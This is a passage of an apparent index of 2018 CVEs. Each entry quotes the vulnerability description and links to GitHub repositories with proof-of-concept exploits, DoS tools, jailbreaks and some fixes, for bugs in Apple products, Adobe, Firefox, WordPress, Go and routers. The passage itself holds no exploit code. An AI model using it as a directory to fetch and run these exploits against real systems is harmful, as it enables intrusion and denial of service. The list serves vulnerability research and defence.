An issue was discovered in certain Apple products. macOS before 10.13.3 is affected. The issue involves the "Wi-Fi" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
- [dybrkr/wifi_leak](https://github.com/dybrkr/wifi_leak)
### CVE-2018-4087 (2018-04-03)
An issue was discovered in certain Apple products. iOS before 11.2.5 is affected. tvOS before 11.2.5 is affected. watchOS before 4.2.2 is affected. The issue involves the "Core Bluetooth" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
- [rani-i/bluetoothdPoC](https://github.com/rani-i/bluetoothdPoC)
- [MTJailed/UnjailMe](https://github.com/MTJailed/UnjailMe)
- [joedaguy/Exploit11.2](https://github.com/joedaguy/Exploit11.2)
### CVE-2018-4110 (2018-04-03)
An issue was discovered in certain Apple products. iOS before 11.3 is affected. The issue involves the "Web App" component. It allows remote attackers to bypass intended restrictions on cookie persistence.
- [bencompton/ios11-cookie-set-expire-issue](https://github.com/bencompton/ios11-cookie-set-expire-issue)
### CVE-2018-4121 (2018-04-03)
An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
- [FSecureLABS/CVE-2018-4121](https://github.com/FSecureLABS/CVE-2018-4121)
- [likekabin/CVE-2018-4121](https://github.com/likekabin/CVE-2018-4121)
- [jezzus/CVE-2018-4121](https://github.com/jezzus/CVE-2018-4121)
### CVE-2018-4124 (2018-04-03)
An issue was discovered in certain Apple products. iOS before 11.2.6 is affected. macOS before 10.13.3 Supplemental Update is affected. tvOS before 11.2.6 is affected. watchOS before 4.2.3 is affected. The issue involves the "CoreText" component. It allows remote attackers to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via a crafted string containing a certain Telugu character.
- [jamf/TELUGU_CVE-2018-4124_POC](https://github.com/jamf/TELUGU_CVE-2018-4124_POC)
### CVE-2018-4150 (2018-04-03)
An issue was discovered in certain Apple products. iOS before 11.3 is affected. macOS before 10.13.4 is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
- [Jailbreaks/CVE-2018-4150](https://github.com/Jailbreaks/CVE-2018-4150)
- [rpwnage/LovelySn0w](https://github.com/rpwnage/LovelySn0w)
- [littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-](https://github.com/littlelailo/incomplete-exploit-for-CVE-2018-4150-bpf-filter-poc-)
### CVE-2018-4185 (2019-01-11)
In iOS before 11.3, tvOS before 11.3, watchOS before 4.3, and macOS before High Sierra 10.13.4, an information disclosure issue existed in the transition of program state. This issue was addressed with improved state handling.
- [bazad/x18-leak](https://github.com/bazad/x18-leak)
- [xigexbh/bazad1](https://github.com/xigexbh/bazad1)
- [Giler2004/bazad1](https://github.com/Giler2004/bazad1)
### CVE-2018-4193 (2018-06-08)
An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Windows Server" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
- [Synacktiv-contrib/CVE-2018-4193](https://github.com/Synacktiv-contrib/CVE-2018-4193)
### CVE-2018-4233 (2018-06-08)
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
- [saelo/cve-2018-4233](https://github.com/saelo/cve-2018-4233)
### CVE-2018-4241 (2018-06-08)
An issue was discovered in certain Apple products. iOS before 11.4 is affected. macOS before 10.13.5 is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "Kernel" component. A buffer overflow in mptcp_usr_connectx allows attackers to execute arbitrary code in a privileged context via a crafted app.
- [0neday/multi_path](https://github.com/0neday/multi_path)
### CVE-2018-4242 (2018-06-08)
An issue was discovered in certain Apple products. macOS before 10.13.5 is affected. The issue involves the "Hypervisor" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
- [yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-](https://github.com/yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-)
### CVE-2018-4243 (2018-06-08)
An issue was discovered in certain Apple products. iOS before 11.4 is affected. macOS before 10.13.5 is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "Kernel" component. A buffer overflow in getvolattrlist allows attackers to execute arbitrary code in a privileged context via a crafted app.
- [Jailbreaks/empty_list](https://github.com/Jailbreaks/empty_list)
### CVE-2018-4248 (2019-04-03)
An out-of-bounds read was addressed with improved input validation. This issue affected versions prior to iOS 11.4.1, macOS High Sierra 10.13.6, tvOS 11.4.1, watchOS 4.3.2.
- [bazad/xpc-string-leak](https://github.com/bazad/xpc-string-leak)
### CVE-2018-4280 (2019-04-03)
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 11.4.1, macOS High Sierra 10.13.6, tvOS 11.4.1, watchOS 4.3.2.
- [bazad/launchd-portrep](https://github.com/bazad/launchd-portrep)
- [bazad/blanket](https://github.com/bazad/blanket)
### CVE-2018-4327 (2019-04-03)
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 11.4.1.
- [omerporze/brokentooth](https://github.com/omerporze/brokentooth)
- [harryanon/POC-CVE-2018-4327-and-CVE-2018-4330](https://github.com/harryanon/POC-CVE-2018-4327-and-CVE-2018-4330)
### CVE-2018-4330 (2019-01-11)
In iOS before 11.4, a memory corruption issue exists and was addressed with improved memory handling.
- [omerporze/toothfairy](https://github.com/omerporze/toothfairy)
### CVE-2018-4331 (2019-04-03)
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.
- [bazad/gsscred-race](https://github.com/bazad/gsscred-race)
### CVE-2018-4343 (2019-04-03)
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.
- [bazad/gsscred-move-uaf](https://github.com/bazad/gsscred-move-uaf)
### CVE-2018-4407 (2019-04-03)
A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.
- [Pa55w0rd/check_icmp_dos](https://github.com/Pa55w0rd/check_icmp_dos)
- [unixpickle/cve-2018-4407](https://github.com/unixpickle/cve-2018-4407)
- [s2339956/check_icmp_dos-CVE-2018-4407-](https://github.com/s2339956/check_icmp_dos-CVE-2018-4407-)
- [farisv/AppleDOS](https://github.com/farisv/AppleDOS)
- [WyAtu/CVE-2018-4407](https://github.com/WyAtu/CVE-2018-4407)
- [zteeed/CVE-2018-4407-IOS](https://github.com/zteeed/CVE-2018-4407-IOS)
- [SamDecrock/node-cve-2018-4407](https://github.com/SamDecrock/node-cve-2018-4407)
- [r3dxpl0it/CVE-2018-4407](https://github.com/r3dxpl0it/CVE-2018-4407)
- [lucagiovagnoli/CVE-2018-4407](https://github.com/lucagiovagnoli/CVE-2018-4407)
- [anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407](https://github.com/anonymouz4/Apple-Remote-Crash-Tool-CVE-2018-4407)
- [soccercab/wifi](https://github.com/soccercab/wifi)
- [zeng9t/CVE-2018-4407-iOS-exploit](https://github.com/zeng9t/CVE-2018-4407-iOS-exploit)
- [5431/CVE-2018-4407](https://github.com/5431/CVE-2018-4407)
- [pwnhacker0x18/iOS-Kernel-Crash](https://github.com/pwnhacker0x18/iOS-Kernel-Crash)
- [Fans0n-Fan/CVE-2018-4407](https://github.com/Fans0n-Fan/CVE-2018-4407)
- [szabo-tibor/CVE-2018-4407](https://github.com/szabo-tibor/CVE-2018-4407)
### CVE-2018-4411 (2019-04-03)
A memory corruption issue was addressed with improved input validation. This issue affected versions prior to macOS Mojave 10.14.
- [lilang-wu/POC-CVE-2018-4411](https://github.com/lilang-wu/POC-CVE-2018-4411)
### CVE-2018-4415 (2019-04-03)
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to macOS Mojave 10.14.1.
- [T1V0h/CVE-2018-4415](https://github.com/T1V0h/CVE-2018-4415)
### CVE-2018-4416 (2019-04-03)
Multiple memory corruption issues were addressed with improved memory handling. This issue affected versions prior to iOS 12.1, tvOS 12.1, watchOS 5.1, Safari 12.0.1, iTunes 12.9.1, iCloud for Windows 7.8.
- [erupmi/CVE-2018-4416-exploit](https://github.com/erupmi/CVE-2018-4416-exploit)
### CVE-2018-4431 (2019-04-03)
A memory initialization issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, macOS Mojave 10.14.2, tvOS 12.1.1, watchOS 5.1.2.
- [ktiOSz/PoC_iOS12](https://github.com/ktiOSz/PoC_iOS12)
### CVE-2018-4441 (2019-04-03)
A memory corruption issue was addressed with improved memory handling. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.
- [Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit](https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit)
### CVE-2018-4878 (2018-02-06)
A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.
- [ydl555/CVE-2018-4878-](https://github.com/ydl555/CVE-2018-4878-)
- [mdsecactivebreach/CVE-2018-4878](https://github.com/mdsecactivebreach/CVE-2018-4878)
- [hybridious/CVE-2018-4878](https://github.com/hybridious/CVE-2018-4878)
- [vysecurity/CVE-2018-4878](https://github.com/vysecurity/CVE-2018-4878)
- [KathodeN/CVE-2018-4878](https://github.com/KathodeN/CVE-2018-4878)
- [SyFi/CVE-2018-4878](https://github.com/SyFi/CVE-2018-4878)
- [ydl555/CVE-2018-4878](https://github.com/ydl555/CVE-2018-4878)
- [B0fH/CVE-2018-4878](https://github.com/B0fH/CVE-2018-4878)
- [Yable/CVE-2018-4878](https://github.com/Yable/CVE-2018-4878)
- [HuanWoWeiLan/SoftwareSystemSecurity-2019](https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019)
- [lvyoshino/CVE-2018-4878](https://github.com/lvyoshino/CVE-2018-4878)
### CVE-2018-4879 (2018-02-27)
An issue was discovered in Adobe Acrobat Reader 2018.009.20050 and earlier versions, 2017.011.30070 and earlier versions, 2015.006.30394 and earlier versions. The vulnerability is caused by the computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.
- [H3llozy/CVE-2018-4879](https://github.com/H3llozy/CVE-2018-4879)
### CVE-2018-4901 (2018-02-27)
An issue was discovered in Adobe Acrobat Reader 2018.009.20050 and earlier versions, 2017.011.30070 and earlier versions, 2015.006.30394 and earlier versions. The vulnerability is caused by the computation that writes data past the end of the intended buffer; the computation is part of the document identity representation. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.
- [bigric3/CVE-2018-4901](https://github.com/bigric3/CVE-2018-4901)
### CVE-2018-5146 (2018-06-11)
An out of bounds memory write while processing Vorbis audio data was reported through the Pwn2Own contest. This vulnerability affects Firefox < 59.0.1, Firefox ESR < 52.7.2, and Thunderbird < 52.7.
- [f01965/CVE-2018-5146](https://github.com/f01965/CVE-2018-5146)
### CVE-2018-5158 (2018-06-11)
The PDF viewer does not sufficiently sanitize PostScript calculator functions, allowing malicious JavaScript to be injected through a crafted PDF file. This JavaScript can then be run with the permissions of the PDF viewer by its worker. This vulnerability affects Firefox ESR < 52.8 and Firefox < 60.
- [ppcrab/CVE-2018-5158](https://github.com/ppcrab/CVE-2018-5158)
- [puzzle-tools/-CVE-2018-5158.pdf](https://github.com/puzzle-tools/-CVE-2018-5158.pdf)
### CVE-2018-5234 (2018-04-30)
The Norton Core router prior to v237 may be susceptible to a command injection exploit. This is a type of attack in which the goal is execution of arbitrary commands on the host system via vulnerable software.
- [embedi/ble_norton_core](https://github.com/embedi/ble_norton_core)
- [saruman9/ble_connect_rust](https://github.com/saruman9/ble_connect_rust)
### CVE-2018-5333 (2018-01-11)
In the Linux kernel through 4.14.13, the rds_cmsg_atomic function in net/rds/rdma.c mishandles cases where page pinning fails or an invalid address is supplied, leading to an rds_atomic_free_op NULL pointer dereference.
- [hoanganh2k/cve-2018-5333](https://github.com/hoanganh2k/cve-2018-5333)
### CVE-2018-5353 (2020-09-29)
The custom GINA/CP module in Zoho ManageEngine ADSelfService Plus before 5.5 build 5517 allows remote attackers to execute code and escalate privileges via spoofing. It does not authenticate the intended server before opening a browser window. An unauthenticated attacker capable of conducting a spoofing attack can redirect the browser to gain execution in the context of the WinLogon.exe process. If Network Level Authentication is not enforced, the vulnerability can be exploited via RDP. Additionally, if the web server has a misconfigured certificate then no spoofing attack is required
- [missing0x00/CVE-2018-5353](https://github.com/missing0x00/CVE-2018-5353)
### CVE-2018-5354 (2020-09-29)
The custom GINA/CP module in ANIXIS Password Reset Client before version 3.22 allows remote attackers to execute code and escalate privileges via spoofing. When the client is configured to use HTTP, it does not authenticate the intended server before opening a browser window. An unauthenticated attacker capable of conducting a spoofing attack can redirect the browser to gain execution in the context of the WinLogon.exe process. If Network Level Authentication is not enforced, the vulnerability can be exploited via RDP.
- [missing0x00/CVE-2018-5354](https://github.com/missing0x00/CVE-2018-5354)
### CVE-2018-5711 (2018-01-16)
gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.
- [huzhenghui/Test-7-2-0-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711)
- [huzhenghui/Test-7-2-1-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-1-PHP-CVE-2018-5711)
### CVE-2018-5728 (2018-01-16)
Cobham Sea Tel 121 build 222701 devices allow remote attackers to obtain potentially sensitive information via a /cgi-bin/getSysStatus request, as demonstrated by the Latitude/Longitude of the ship, or satellite details.
- [ezelf/seatel_terminals](https://github.com/ezelf/seatel_terminals)
### CVE-2018-5740 (2019-01-16)
"deny-answer-aliases" is a little-used feature intended to help recursive server operators protect end users against DNS rebinding attacks, a potential method of circumventing the security model used by client browsers. However, a defect in this feature makes it easy, when the feature is in use, to experience an assertion failure in name.c. Affects BIND 9.7.0->9.8.8, 9.9.0->9.9.13, 9.10.0->9.10.8, 9.11.0->9.11.4, 9.12.0->9.12.2, 9.13.0->9.13.2.
- [sischkg/cve-2018-5740](https://github.com/sischkg/cve-2018-5740)
### CVE-2018-5767 (2018-02-15)
An issue was discovered on Tenda AC15 V15.03.1.16_multi devices. A remote, unauthenticated attacker can gain remote code execution on the device with a crafted password parameter for the COOKIE header.
- [db44k/CVE-2018-5767-AC9](https://github.com/db44k/CVE-2018-5767-AC9)
- [Scorpion-Security-Labs/CVE-2018-5767-AC9](https://github.com/Scorpion-Security-Labs/CVE-2018-5767-AC9)
### CVE-2018-5873 (2018-07-06)
An issue was discovered in the __ns_get_path function in fs/nsfs.c in the Linux kernel before 4.11. Due to a race condition when accessing files, a Use After Free condition can occur. This also affects all Android releases from CAF using the Linux kernel (Android for MSM, Firefox OS for MSM, QRD Android) before security patch level 2018-07-05.
- [Trinadh465/linux-4.1.15_CVE-2018-5873](https://github.com/Trinadh465/linux-4.1.15_CVE-2018-5873)
### CVE-2018-5951 (2020-03-02)
An issue was discovered in Mikrotik RouterOS. Crafting a packet that has a size of 1 byte and sending it to an IPv6 address of a RouterOS box with IP Protocol 97 will cause RouterOS to reboot imminently. All versions of RouterOS that supports EoIPv6 are vulnerable to this attack.
- [Nat-Lab/CVE-2018-5951](https://github.com/Nat-Lab/CVE-2018-5951)
### CVE-2018-5955 (2018-01-21)
An issue was discovered in GitStack through 2.3.10. User controlled input is not sufficiently filtered, allowing an unauthenticated attacker to add a user to the server via the username and password fields to the rest/user/ URI.
- [b0bac/GitStackRCE](https://github.com/b0bac/GitStackRCE)
- [YagamiiLight/Cerberus](https://github.com/YagamiiLight/Cerberus)
- [MikeTheHash/CVE-2018-5955](https://github.com/MikeTheHash/CVE-2018-5955)
### CVE-2018-6065 (2018-11-14)
Integer overflow in computing the required allocation size when instantiating a new javascript object in V8 in Google Chrome prior to 65.0.3325.146 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [b1tg/CVE-2018-6065-exploit](https://github.com/b1tg/CVE-2018-6065-exploit)
### CVE-2018-6066 (2018-11-14)
Lack of CORS checking by ResourceFetcher/ResourceLoader in Blink in Google Chrome prior to 65.0.3325.146 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
- [DISREL/Ring0VBA](https://github.com/DISREL/Ring0VBA)
### CVE-2018-6242 (2018-05-01)
Some NVIDIA Tegra mobile processors released prior to 2016 contain a buffer overflow vulnerability in BootROM Recovery Mode (RCM). An attacker with physical access to the device's USB and the ability to force the device to reboot into RCM could exploit the vulnerability to execute unverified code.
- [DavidBuchanan314/NXLoader](https://github.com/DavidBuchanan314/NXLoader)
- [reswitched/rcm-modchips](https://github.com/reswitched/rcm-modchips)
- [ChrisFigura/react-tegra-payload-launcher](https://github.com/ChrisFigura/react-tegra-payload-launcher)
- [austinhartzheim/fusee-gelee](https://github.com/austinhartzheim/fusee-gelee)
- [Swiftloke/fusee-toy](https://github.com/Swiftloke/fusee-toy)
### CVE-2018-6341 (2018-12-31)
React applications which rendered to HTML using the ReactDOMServer API were not escaping user-supplied attribute names at render-time. That lack of escaping could lead to a cross-site scripting vulnerability. This issue affected minor releases 16.0.x, 16.1.x, 16.2.x, 16.3.x, and 16.4.x. It was fixed in 16.0.1, 16.1.2, 16.2.1, 16.3.3, and 16.4.2.
- [diwangs/react16-ssr](https://github.com/diwangs/react16-ssr)
### CVE-2018-6376 (2018-01-30)
In Joomla! before 3.8.4, the lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the Hathor postinstall message.
- [knqyf263/CVE-2018-6376](https://github.com/knqyf263/CVE-2018-6376)
### CVE-2018-6389 (2018-02-06)
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
- [yolabingo/wordpress-fix-cve-2018-6389](https://github.com/yolabingo/wordpress-fix-cve-2018-6389)
- [safebuffer/CVE-2018-6389](https://github.com/safebuffer/CVE-2018-6389)
- [rastating/modsecurity-cve-2018-6389](https://github.com/rastating/modsecurity-cve-2018-6389)
- [knqyf263/CVE-2018-6389](https://github.com/knqyf263/CVE-2018-6389)
- [JulienGadanho/cve-2018-6389-php-patcher](https://github.com/JulienGadanho/cve-2018-6389-php-patcher)
- [dsfau/wordpress-CVE-2018-6389](https://github.com/dsfau/wordpress-CVE-2018-6389)
- [Jetserver/CVE-2018-6389-FIX](https://github.com/Jetserver/CVE-2018-6389-FIX)
- [thechrono13/PoC---CVE-2018-6389](https://github.com/thechrono13/PoC---CVE-2018-6389)
- [BlackRouter/cve-2018-6389](https://github.com/BlackRouter/cve-2018-6389)
- [alessiogilardi/PoC---CVE-2018-6389](https://github.com/alessiogilardi/PoC---CVE-2018-6389)
- [JavierOlmedo/wordpress-cve-2018-6389](https://github.com/JavierOlmedo/wordpress-cve-2018-6389)
- [m3ssap0/wordpress_cve-2018-6389](https://github.com/m3ssap0/wordpress_cve-2018-6389)
- [s0md3v/Shiva](https://github.com/s0md3v/Shiva)
- [mudhappy/Wordpress-Hack-CVE-2018-6389](https://github.com/mudhappy/Wordpress-Hack-CVE-2018-6389)
- [armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389](https://github.com/armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389)
- [ItinerisLtd/trellis-cve-2018-6389](https://github.com/ItinerisLtd/trellis-cve-2018-6389)
- [Zazzzles/Wordpress-DOS](https://github.com/Zazzzles/Wordpress-DOS)
- [fakedob/tvsz](https://github.com/fakedob/tvsz)
- [vineetkia/Wordpress-DOS-Attack-CVE-2018-6389](https://github.com/vineetkia/Wordpress-DOS-Attack-CVE-2018-6389)
- [ianxtianxt/CVE-2018-6389](https://github.com/ianxtianxt/CVE-2018-6389)
- [amit-pathak009/CVE-2018-6389-FIX](https://github.com/amit-pathak009/CVE-2018-6389-FIX)
### CVE-2018-6396 (2018-02-17)
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.
- [JavierOlmedo/joomla-cve-2018-6396](https://github.com/JavierOlmedo/joomla-cve-2018-6396)
### CVE-2018-6407 (2018-01-30)
An issue was discovered on Conceptronic CIPCAMPTIWL V3 0.61.30.21 devices. An unauthenticated attacker can crash a device by sending a POST request with a huge body size to /hy-cgi/devices.cgi?cmd=searchlandevice. The crash completely freezes the device.
- [dreadlocked/ConceptronicIPCam_MultipleVulnerabilities](https://github.com/dreadlocked/ConceptronicIPCam_MultipleVulnerabilities)
### CVE-2018-6479 (2018-01-31)
An issue was discovered on Netwave IP Camera devices. An unauthenticated attacker can crash a device by sending a POST request with a huge body size to the / URI.
- [dreadlocked/netwave-dosvulnerability](https://github.com/dreadlocked/netwave-dosvulnerability)
- [LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479](https://github.com/LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479)
### CVE-2018-6518 (2018-04-26)
Composr CMS 10.0.13 has XSS via the site_name parameter in a page=admin-setupwizard&type=step3 request to /adminzone/index.php.
- [faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS](https://github.com/faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS)
### CVE-2018-6546 (2018-04-13)
plays_service.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, executes code at a user-defined (local or SMB) path as SYSTEM when the execute_installer parameter is used in an HTTP message. This occurs without properly authenticating the user.
- [securifera/CVE-2018-6546-Exploit](https://github.com/securifera/CVE-2018-6546-Exploit)
### CVE-2018-6574 (2018-02-07)
Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.
- [acole76/cve-2018-6574](https://github.com/acole76/cve-2018-6574)
- [neargle/Go-Get-RCE-CVE-2018-6574-POC](https://github.com/neargle/Go-Get-RCE-CVE-2018-6574-POC)
- [wb4r/go-get-rce](https://github.com/wb4r/go-get-rce)
- [ahmetmanga/go-get-rce](https://github.com/ahmetmanga/go-get-rce)
- [ahmetmanga/cve-2018-6574](https://github.com/ahmetmanga/cve-2018-6574)
- [redirected/cve-2018-6574](https://github.com/redirected/cve-2018-6574)
- [20matan/CVE-2018-6574-POC](https://github.com/20matan/CVE-2018-6574-POC)
- [zur250/Zur-Go-GET-RCE-Solution](https://github.com/zur250/Zur-Go-GET-RCE-Solution)
- [mekhalleh/cve-2018-6574](https://github.com/mekhalleh/cve-2018-6574)
- [veter069/go-get-rce](https://github.com/veter069/go-get-rce)
- [duckzsc2/CVE-2018-6574-POC](https://github.com/duckzsc2/CVE-2018-6574-POC)
- [dollyptm/cve-2018-6574](https://github.com/dollyptm/cve-2018-6574)
- [qweraqq/CVE-2018-6574](https://github.com/qweraqq/CVE-2018-6574)
- [d4rkshell/go-get-rce](https://github.com/d4rkshell/go-get-rce)
- [chaosura/CVE-2018-6574](https://github.com/chaosura/CVE-2018-6574)
- [french560/ptl6574](https://github.com/french560/ptl6574)
- [InfoSecJack/CVE-2018-6574](https://github.com/InfoSecJack/CVE-2018-6574)
- [asavior2/CVE-2018-6574](https://github.com/asavior2/CVE-2018-6574)
- [drset/golang](https://github.com/drset/golang)
- [frozenkp/CVE-2018-6574](https://github.com/frozenkp/CVE-2018-6574)
- [kev-ho/cve-2018-6574-payload](https://github.com/kev-ho/cve-2018-6574-payload)
- [sdosis/cve-2018-6574](https://github.com/sdosis/cve-2018-6574)
- [No1zy/CVE-2018-6574-PoC](https://github.com/No1zy/CVE-2018-6574-PoC)
- [nthuong95/CVE-2018-6574](https://github.com/nthuong95/CVE-2018-6574)
- [AdriVillaB/CVE-2018-6574](https://github.com/AdriVillaB/CVE-2018-6574)
- [yitingfan/CVE-2018-6574_demo](https://github.com/yitingfan/CVE-2018-6574_demo)
- [mhamed366/CVE-2018-6574](https://github.com/mhamed366/CVE-2018-6574)
- [Eugene24/CVE-2018-6574](https://github.com/Eugene24/CVE-2018-6574)
- [coblax/CVE-2018-6574](https://github.com/coblax/CVE-2018-6574)
- [darthvader-htb/CVE-2018-6574](https://github.com/darthvader-htb/CVE-2018-6574)
- [it3x55/CVE-2018-6574](https://github.com/it3x55/CVE-2018-6574)
- [Malone5923/CVE-2018-6574-go-get-RCE](https://github.com/Malone5923/CVE-2018-6574-go-get-RCE)
- [illnino/CVE-2018-6574](https://github.com/illnino/CVE-2018-6574)
- [TakuCoder/CVE-2018-6574](https://github.com/TakuCoder/CVE-2018-6574)
- [kawkab101/cve-2018-6574](https://github.com/kawkab101/cve-2018-6574)
- [lsnakazone/cve-2018-6574](https://github.com/lsnakazone/cve-2018-6574)
- [pswalia2u/CVE-2018-6574](https://github.com/pswalia2u/CVE-2018-6574)
- [jongmartinez/CVE-2018-6574-POC](https://github.com/jongmartinez/CVE-2018-6574-POC)
- [azzzzzzzzzzzzzzzzz/CVE-2018-6574](https://github.com/azzzzzzzzzzzzzzzzz/CVE-2018-6574)
- [noname-nohost/CVE-2018-6574](https://github.com/noname-nohost/CVE-2018-6574)
- [shadofren/CVE-2018-6574](https://github.com/shadofren/CVE-2018-6574)
- [NikolaT3sla/cve-2018-6574](https://github.com/NikolaT3sla/cve-2018-6574)
- [vishack/CVE-2018-6574](https://github.com/vishack/CVE-2018-6574)
- [PLP-Orange/cve-2018-6574-exercise](https://github.com/PLP-Orange/cve-2018-6574-exercise)
- [purgedemo/CVE-2018-6574](https://github.com/purgedemo/CVE-2018-6574)
- [purgedemo/CVE-2018-6574_2](https://github.com/purgedemo/CVE-2018-6574_2)
- [killtr0/POC-CVE-2018-6574](https://github.com/killtr0/POC-CVE-2018-6574)
- [theJuan1112/pentesterlab-cve-2018-6574](https://github.com/theJuan1112/pentesterlab-cve-2018-6574)
- [MohamedTarekq/test-CVE-2018-6574-](https://github.com/MohamedTarekq/test-CVE-2018-6574-)
- [OLAOLAOLA789/CVE-2018-6574](https://github.com/OLAOLAOLA789/CVE-2018-6574)
- [repos13579/labCVE-2018-6574](https://github.com/repos13579/labCVE-2018-6574)
- [sec000/cve-2018-6574](https://github.com/sec000/cve-2018-6574)
- [jaya522/CVE-2018-6574-go-get-RCE](https://github.com/jaya522/CVE-2018-6574-go-get-RCE)
- [noobTest1122/CVE-2018-6574](https://github.com/noobTest1122/CVE-2018-6574)
- [ErnestZiemkowski/cve-2018-6574](https://github.com/ErnestZiemkowski/cve-2018-6574)
- [l3ouu4n9/CVE-2018-6574-POC](https://github.com/l3ouu4n9/CVE-2018-6574-POC)
- [R3dAlch3mist/cve-2018-6574](https://github.com/R3dAlch3mist/cve-2018-6574)
- [Devang-Solanki/CVE-2018-6574](https://github.com/Devang-Solanki/CVE-2018-6574)
- [ItsFadinG/CVE-2018-6574](https://github.com/ItsFadinG/CVE-2018-6574)
- [imojne/CVE-2018-6574-POC](https://github.com/imojne/CVE-2018-6574-POC)
- [twseptian/cve-2018-6574](https://github.com/twseptian/cve-2018-6574)
- [the-valluvarsploit/CVE-2018-6574](https://github.com/the-valluvarsploit/CVE-2018-6574)
- [yavolo/CVE-2018-6574](https://github.com/yavolo/CVE-2018-6574)
- [jftierno/CVE-2018-6574](https://github.com/jftierno/CVE-2018-6574)
- [Cypheer/exploit_CVE-2018-6574](https://github.com/Cypheer/exploit_CVE-2018-6574)
- [jftierno/CVE-2018-6574-2](https://github.com/jftierno/CVE-2018-6574-2)
- [tjcim/cve-2018-6574](https://github.com/tjcim/cve-2018-6574)
- [markisback/CVE-2018-6574](https://github.com/markisback/CVE-2018-6574)
- [hasharmujahid/CVE-2018-6574-go-get-RCE](https://github.com/hasharmujahid/CVE-2018-6574-go-get-RCE)
- [jeyaseelans86/CVE-2018-6574](https://github.com/jeyaseelans86/CVE-2018-6574)
- [jeyaseelans86/new-CVE-2018-6574](https://github.com/jeyaseelans86/new-CVE-2018-6574)
- [chr1sM/CVE-2018-6574](https://github.com/chr1sM/CVE-2018-6574)
- [mux0x/CVE-2018-6574](https://github.com/mux0x/CVE-2018-6574)
- [seoqqq/CVE-2018-6574](https://github.com/seoqqq/CVE-2018-6574)
- [antunesmpedro/CVE-2018-6574](https://github.com/antunesmpedro/CVE-2018-6574)
- [jahwni/CVE-2018-6574](https://github.com/jahwni/CVE-2018-6574)
- [NsByte/CVE-2018-6574](https://github.com/NsByte/CVE-2018-6574)
